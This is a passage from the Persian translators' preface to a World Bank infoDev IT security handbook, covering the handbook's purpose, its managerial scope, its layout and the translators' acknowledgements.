‫ﺩﺍﺭﺩ؛ ﻭ ﻫﺮﻳﮏ ﺍﺯ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﺧﻮﺩ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺩﻟﻴﻞ ﻣﺤﮑﻤﻲ ﺑﺮﺍﻱ ﺟﺪﻱ ﮔﺮﻓﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﺍﮐﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﻮﺍﻉ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺧﺮﺍﺑﮑﺎﺭﺍﻥ ﻫﺴﺘﻨﺪ؛ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻮﻥ ﺩﺳﺘﮑﺎﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺮﺟﻊ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ‪ ،‬ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﺷـﻤﺎﺭ‬
‫ﺭﻭﻧﺪ )ﻣﺜﻞ ﺳﺮﻋﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ(‪ ،‬ﺍﮔﺮ ﺗﺤﺖ ﮐﻨﺘﺮﻝ ﻧﺒﺎﺷﻨﺪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺷﻮﻧﺪ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﺪﻧﻴﺖ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻧﻔﻮﺫ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻴﺎﻧﺠﺎﻣﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﻣﺸﻜﻼﺕ ﻃﺒﻴﻌـﻲ ﻭ ﺧﻄﺎﻫـﺎﻱ ﻏﻴﺮﻋﻤـﺪﻱ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﻓﻘﺪﺍﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻣﺨﺮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﺩﺭ ﮐﻨﺎﺭ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ‪ ،‬ﻣﻮﺿﻮﻉ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺮ ﭘﻴﭽﻴﺪﮔﻲ ﮐﺎﺭ ﺩﻭﻟﺘﻬـﺎ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺧﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﻣﻲﺍﻓﺰﺍﻳﺪ‪ ،‬ﻭ ﺍﻫﻤﻴﺖ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻭﻟﺘﻲ‪ ،‬ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺻﺤﻴﺢ ﻭ ﻣﺆﺛﺮ ﺁﻧﻬﺎ ﺑﻪ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﻭ‬
‫ﭼﻨﺪﺍﻥ ﻣﻲﮐﻨﺪ‪ .‬ﺁﺧﺮﻳﻦ ﺁﻣﺎﺭﻫﺎﻱ ﺟﻬﺎﻧﻲ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﻭﻟﺘﻲ ﻭ ﺗﺠﺎﺭﻱ ﻛﻪ ﺗﻮﺳـﻂ ﻭﻳـﺮﻭﺱ‪ ،‬ﻛـﺮﻡ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ‬
‫ﺳﺮﻭﻳﺲ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪ‪ ،‬ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺧﻮﺑﻲ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ‪ .‬ﻃﺒﻖ ﺗﺨﻤﻴﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‬
‫)ﮐﻪ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺸﺮﻭ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ(‪ ،‬ﺗﻨﻬـﺎ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۳‬ﺿـﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪﻥ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻟﻎ ﺑﺮ ‪ ۱۰‬ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺁﻭﺭﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ‪ ،‬ﺗﺪﻭﻳﻦ ﻭ ﺍﺟﺮﺍﻱ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺩﻩ‪ ،‬ﺿﺮﻭﺭﺗﻲ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘـﺬﻳﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﺤـﺴﻮﺏ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺩﺭ ﺣـﺪ‬
‫ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ ﻧﮕﻪ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻗﺎﺑﻠﻴﺖ ﻭﺍﮐﻨﺶ ﺳﺮﻳﻊ ﻭ ﻣﺆﺛﺮ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ ﺗﺎ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦ‪-‬‬
‫ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ ﺗﺎ ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﮐﺴﺐ ﻭ ﮐﺎﺭ ﺑﺎ ﺧﻴﺎﻟﻲ ﺁﺳﻮﺩﻩﺗﺮ ﺗﺪﺍﻭﻡ ﻳﺎﺑﺪ‪.‬‬
‫"ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﭘﺲ ﺍﺯ ﺩﺭﮎ ﺿﺮﻭﺭﺕ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‪ ،‬ﺑﻪ ﺳﻔﺎﺭﺵ ﺑﺎﻧﮏ ﺟﻬـﺎﻧﻲ ﻭ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ‬
‫‪) infoDev‬ﻳﮑﻲ ﺍﺯ ﺯﻳﺮﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺑﺎﻧﮏ ﺟﻬﺎﻧﻲ( ﻭ ﺑﻪ ﻋﻨﻮﺍﻥ ﺗﻼﺷﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﮐـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺩﺭ‬
‫ﺍﻳﻦ ﻧﻬﺎﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﺪﻭﻳﻦ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺩﺭ ﺍﺟﻼﺱ ﻧﺨﺴﺖ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ )‪ (WSIS‬ﺩﺭ ﺳـﻮﺋﻴﺲ‪ ،‬ﺩﺭ ﺩﺳـﺎﻣﺒﺮ ﺳـﺎﻝ ‪۲۰۰۳‬‬
‫ﻣﻴﺎﻥ ﺷﺮﮐﺖﮐﻨﻨﺪﮔﺎﻥ ﺗﻮﺯﻳﻊ ﺷﺪ‪ .‬ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ﺣﺎﺻﻞ ﺑﺮﺭﺳﻲ ﮐﺘﺎﺑﻬـﺎ‪ ،‬ﻣﻘـﺎﻻﺕ‪ ،‬ﺭﺳـﺎﻟﻪﻫـﺎ‪ ،‬ﻭ ﻣـﺴﺘﻨﺪﺍﺕ ﺗﺨﺼـﺼﻲ ﺯﻳـﺎﺩﻱ ﺍﺯ‬
‫ﮐﺎﺭﺷﻨﺎﺳﺎﻥ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺣﻮﺯﻩ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺍﺳﺖ‪ .‬ﻓﻬﺮﺳﺖ ﮐﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺟـﻊ ﺩﺭ ﺑﺨـﺶ ﺷـﺸﻢ )ﭘﻴﻮﺳـﺘﻬﺎ( ﺁﻣـﺪﻩ ﺍﺳـﺖ ﮐـﻪ‬
‫ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﮑﺎﺕ ﻭ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻴﺰ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻨﺪ‪.‬‬
‫‪١٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﮐﺘﺎﺏ ﺣﺎﺿﺮ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﮑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻌﺎﺭﻳﻒ ﻭ ﺭﺍﻫﮑﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﮐﺮﺩﻩ‪ ،‬ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺁﻧﻬﺎ ﺭﺍ ﻧﻴﺰ‬
‫ﻣﺪﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ ﻭ ﺩﺭ ﻣﺘﻦ ﺍﻭﻟﻴﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﺮﺟﻤﺔ ﺁﻥ ﺗﻼﺵ ﺷﺪﻩ ﺗﺎ ﺣﺪ ﺍﻣﮑﺎﻥ ﻣﻄﺎﻟﺐ ﺑﮕﻮﻧﻪﺍﻱ ﻋﻨﻮﺍﻥ ﺷﻮﻧﺪ ﮐـﻪ ﻓﻬـﻢ ﻭ ﺩﺭﮎ‬
‫ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧﺶ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﮐﺎﺭ ﺟﺎﻣﻌﺔ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ )ﺧﺼﻮﺻﹰﺎ ﻣـﺪﻳﺮﺍﻥ(‬
‫ﺑﻴﺎﻳﺪ‪ ،‬ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻥ ﺳﺮﻓﺼﻠﻬﺎﻳﻲ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮐﻮﺗﺎﻩﻣﺪﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ‪.‬‬
‫ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ‪ ،‬ﮐﺘﺎﺑﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻨﺘﺸﺮ ﻭ ﺑﺘـﺎﺯﮔﻲ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺗﻮﺳـﻂ‬
‫ﻣﺘﺮﺟﻤﺎﻥ ﺑﺎﺗﺠﺮﺑﻪ ﻭ ﻳﺎ ﺟﻮﺍﻥ ﺑﻪ ﻓﺎﺭﺳﻲ ﺗﺮﺟﻤﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﭼﻮﻥ ﺑﻪ ﻣﻮﺿﻮﻋﻲ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ‪ ،‬ﻓﺎﻗـﺪ ﻧﮕـﺎﻩ‬
‫ﮐﻼﻥ ﻭ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ‪ .‬ﮐﺘﺎﺑﻲ ﮐﻪ ﭘﻴﺶ ﺭﻭﻱ ﺷﻤﺎ ﺍﺳﺖ‪ ،‬ﺑﺎ ﻧﮕﺎﻩ ﮐﻼﻥ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‪ ،‬ﮐﻮﺷﻴﺪﻩ ﻣﻔﺎﻫﻴﻢ ﻣﻄـﺮﺡ ﺩﺭ‬
‫ﻫﺮﻳﮏ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺁﻧﺮﺍ ﺷﺮﺡ ﺩﻫﺪ‪ ،‬ﻭ ﺁﻧﺠﺎ ﮐﻪ ﻻﺯﻡ ﺑﻮﺩﻩ ﺍﺯ ﺑﺮﺭﺳﻲ ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻧﻴﺰ ﻏﺎﻓﻞ ﻧﺸﺪﻩ‪ ،‬ﻫﺮﭼﻨﺪ ﻫﻴﭽﮕﺎﻩ ﺁﻧﭽﻨﺎﻥ ﻭﺍﺭﺩ ﻣﺴﺎﺋﻞ‬
‫ﻓﻨﻲ ﻧﺸﺪﻩ ﮐﻪ ﮐﻼﻥﻧﮕﺮﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺍﻳﻨﮑﺎﺭ ﺭﺍ ﺑﻪ ﮐﺘﺎﺑﻬﺎﻱ ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻭﺍﮔﺬﺍﺭ ﮐﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺘﺮﺟﻤﺎﻥ ﺍﻳﻦ ﺍﺛﺮ ﻫﻤﻮﺍﺭﻩ ﮐﻮﺷﻴﺪﻩﺍﻧﺪ ﺗﺎ ﺩﺭ ﺍﻧﺘﻘﺎﻝ ﻣﻔﺎﻫﻴﻢ ﻭ ﻧﮑﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ‪ ،‬ﺣﻔﻆ ﺍﻣﺎﻧﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﻫﻴﭽﮕﺎﻩ ﻣﻌﺎﻧﻲ ﺭﺍ ﻓـﺪﺍﻱ ﺍﻟﻔـﺎﻅ‬
‫ﻧﮑﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻭﺍﮊﻩﺳﺎﺯﻱ ﻳﺎ ﻣﻌﺎﺩﻝﺳﺎﺯﻱ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ ،‬ﮐﻪ ﮐﺎﺭﻱ ﻃﺎﻗﺖﻓﺮﺳﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺖﺁﻭﺭ ﺍﺳﺖ‪ .‬ﺳﺎﻳﺮ ﻋﻨـﺎﻭﻳﻨﻲ ﮐـﻪ ﺑـﺮﺍﻱ‬
‫ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳﻲ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺳﺎﺧﺘﻪ ﻧـﺸﺪﻩ ﻧﻴـﺰ ﺑـﺼﻮﺭﺕ ﺍﺻـﻠﻲ ﺩﺭ ﺗﺮﺟﻤـﻪ ﺗﮑـﺮﺍﺭ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻣﺤﺘـﺮﻡ ﺍﻋـﻢ ﺍﺯ‬
‫ﺻﺎﺣﺒﻨﻈﺮﺍﻥ‪ ،‬ﺍﺳﺎﺗﻴﺪ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ‪ ،‬ﻭ ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺍﻧﺘﻘﺎﺩﺍﺕ ﺧﻮﺩ ﻣﺎ ﺭﺍ ﺩﺭ ﺭﻓـﻊ ﻟﻐﺰﺷـﻬﺎ ﻭ ﮐﺎﺳـﺘﻴﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ ﺍﻳـﻦ‬
‫ﮐﺘﺎﺏ ﺁﮔﺎﻩ ﺳﺎﺯﻧﺪ ﺗﺎ ﺩﺭ ﺻﺪﺩ ﺭﻓﻊ ﺁﻧﻬﺎ ﺑﺮﺁﻳﻴﻢ‪.‬‬
‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺩﺭﮔﻤﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﮐﻪ ﺑﻪ ﺗﺎﺯﮔﻲ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﻨﻮﺯ ﺑﺎ ﺍﺻﻄﻼﺣﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻭ ﻣﻌﺎﺩﻟﻬﺎﻱ ﺭﺍﻳﺞ ﺁﻧﻬﺎ ﺁﺷﻨﺎﻳﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﮐﺘﺎﺏ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ ﮐﻪ ﺩﺭ ﮐﺘﺎﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻲ ﺑﮑﺎﺭﺭﻓﺘﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﮐﺘﺎﺏ ﻧﻴﺰ ﺍﺯ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﮐﺘﺎﺏ ﺍﻟﮕﻮﺑﺮﺩﺍﺭﻱ ﺷـﺪﻩ ﻭ ﺟـﺰ‬
‫ﺷﺪﻩ ﻭ ﻧﻴﺰ ﻣﻌﺎﺩﻝ ﻓﺎﺭﺳ ﹺ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ ‪ -‬ﮐﻪ ﺑﺪﻟﻴﻞ ﻭﺟﻮﺩ ﻣﺘﻮﻥ ﻓﻨﻲ ﻭ ﻣﺘﻦﺑﺮﻧﺎﻣﻪ ﺯﻳﺎﺩ‪ ،‬ﺍﺯ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﺻﻔﺤﻪ ﺑﺮﺍﻱ ﻣﺘﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ‪ -‬ﺩﺭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎ ﺍﺯ‬
‫ﺻﻔﺤﻪﺁﺭﺍﻳﻲ ﺩﻭﺳﺘﻮﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﺧﺎﻧﻢ ﻣﺮﻳﻢ ﺍﻓﺘﺨﺎﺭﻱ ﻭ ﺁﻗﺎﻳﺎﻥ ﻣﺤﻤﺪﻣﻬﺪﻱ ﺟﺎﻗﻮﺭﻱ‪ ،‬ﺍﻓﺸﻴﻦ ﻻﻣﻌﻲ‪ ،‬ﻭ ﻧﻴﻤﺎ ﻟﻄﻔﻲ ﮐـﻪ ﺩﺭ ﺗﻬﻴـﺔ‬
‫ﺍﻳﻦ ﺍﺛﺮ ﻣﺘﺤﻤﻞ ﺯﺣﻤﺎﺗﻲ ﺷﺪﻧﺪ‪ ،‬ﮐﻠﻴﺔ ﺍﺳﺎﺗﻴﺪ ﻭ ﺻﺎﺣﺒﻨﻈﺮﺍﻧﻲ ﮐﻪ ﺑﺎ ﺍﺭﺍﺋﻪ ﻧﻈﺮﺍﺕ ﮐﺎﺭﺷﻨﺎﺳﻲ ﻭ ﺭﺍﻫﮕـﺸﺎﻱ ﺧـﻮﺩ ﺑـﻪ ﻣـﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﮑـﺎﺭ‬
‫ﺩﻟﮕﺮﻣﻲ ﺩﺍﺩﻧﺪ‪ ،‬ﮐﻠﻴﺔ ﻫﻤﮑﺎﺭﺍﻧﻲ ﮐﻪ ﺑﻪ ﻧﻮﻋﻲ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺍﺛﺮ ﻧﻘﺶ ﺩﺍﺷﺘﻨﺪ‪ ،‬ﻭ ﻧﻴﺰ ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷـﻮﺭﺍﻱ ﻋـﺎﻟﻲ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﮐـﻪ‬
‫ﺯﺣﻤﺖ ﭼﺎﭖ ﻭ ﻧﺸﺮ ﺍﻳﻦ ﮐﺘﺎﺏ ﺭﺍ ﻋﻬﺪﻩﺩﺍﺭ ﺷﺪ ﺻﻤﻴﻤﺎﻧﻪ ﺗﺸﮑﺮ ﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﺍﻣﻴﺪ ﺁﻧﮑﻪ ﺍﻳﻦ ﻣﮑﺘﻮﺏ ﺑﺘﻮﺍﻧﺪ ﺍﺛﺮﻱ ﻫﺮﭼﻨﺪ ﺟﺰﺋﻲ ﺩﺭ ﺳﻴﺮ ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻮﺳﻌﺔ ﮐﺸﻮﺭ ﺩﺭ ﻣﺴﻴﺮ ﻧﻴﻞ ﺑﻪ ﺍﻳﺮﺍﻧﻲ ﺁﺑﺎﺩ‪ ،‬ﺁﺯﺍﺩ ﻭ ﺳﺮﻓﺮﺍﺯ ﻣﺆﺛﺮ ﺍﻓﺘﺪ‪.‬‬
‫ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ‬
‫ﺗﺎﺑﺴﺘﺎﻥ ‪۱۳۸۴‬‬
‫ﺩﻳﺒﺎﭼﻪ‬
‫ﻛﻠﻴﺔ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﻃﺮﺡ ‪ infoDev‬ﮔﺮﻭﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‪ ١‬ﺗﺄﻣﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻃﻲ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ‬
‫ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ٢‬ﺑﻪ ﺍﻫﻤﻴﺘﻲ ﻭﻳﮋﻩ ﺩﺳﺖ ﻳﺎﻓﺘﻪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﮔﺮﻭﻩ ﻣﺸﺎﻭﺭﺓ ﻓﻨـﻲ ‪ ٣infoDev‬ﻭﺍﻗـﻊ ﺷـﺪﻩ‬
